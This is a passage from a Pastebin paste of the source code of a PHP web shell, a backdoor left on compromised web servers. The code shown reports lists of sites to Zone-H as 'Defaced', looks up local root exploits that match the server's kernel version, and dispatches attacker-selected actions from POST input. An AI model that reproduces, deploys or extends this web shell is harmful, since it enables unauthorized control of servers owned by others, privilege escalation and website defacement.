  2199.                     die("[-] You Must Select The Method !");
  2200.                 }
  2201.                 elseif($neden9 == "--------SELECT--------")
  2202.                 {
  2203.                     die("[-] You Must Select The Reason");
  2204.                 }
  2205.                 elseif(empty($site9))
  2206.                 {
  2207.                     die("[-] You Must Inter the Sites List ! ");
  2208.                 }
  2209.  
  2210.                 $i = 0;
  2211.                 $sites = explode("\n", $site9);
  2212.                 while($i < count($sites))
  2213.                 {
  2214.                
  2215.                 if(substr($sites[$i], 0, 4) != "http")
  2216.                     {
  2217.                         $sites[$i] = "http://".$sites[$i];
  2218.                     }
  2219.                     ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
  2220.                     echo "Site : ".$sites[$i]." Defaced ! </br>";
  2221.                     ++$i;
  2222.                 }
  2223.                 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  2224.  
  2225.     }
  2226. echo '</div';
  2227. printFooter();
  2228. }
  2229.  
  2230. function ZoneH($url9, $hacker9, $hackmode9,$reson9, $site9 )
  2231. {
  2232.     $k = curl_init();
  2233.     curl_setopt($k, CURLOPT_URL, $url9);
  2234.     curl_setopt($k,CURLOPT_POST,true);
  2235.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker9."&domain1=". $site9."&hackmode=".$hackmode9."&reason=".$reson9);
  2236.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  2237.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  2238.     $kubra = curl_exec($k);
  2239.     curl_close($k);
  2240.     return $kubra;
  2241. }
  2242.  
  2243. function rootxpL()
  2244. {
  2245.     $v=@php_uname();
  2246.     $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
  2247.     foreach($db as $k=>$x)if(strstr($v,$k))return $x;
  2248.     if(!$xpl)$xpl='<font color="red">Not found.</font>';
  2249.     return $xpl;
  2250. }
  2251.  
  2252. /* additional Function  */
  2253.  
  2254.  
  2255. /*           additionanal endsss */
  2256.  
  2257. if( empty($_POST['a']) )
  2258.     if(isset($default_action) && function_exists('action' . $default_action))
  2259.         $_POST['a'] = $default_action;
  2260. else    $_POST['a'] = 'SecInfo';
  2261. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  2262.     call_user_func('action' . $_POST['a']);?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top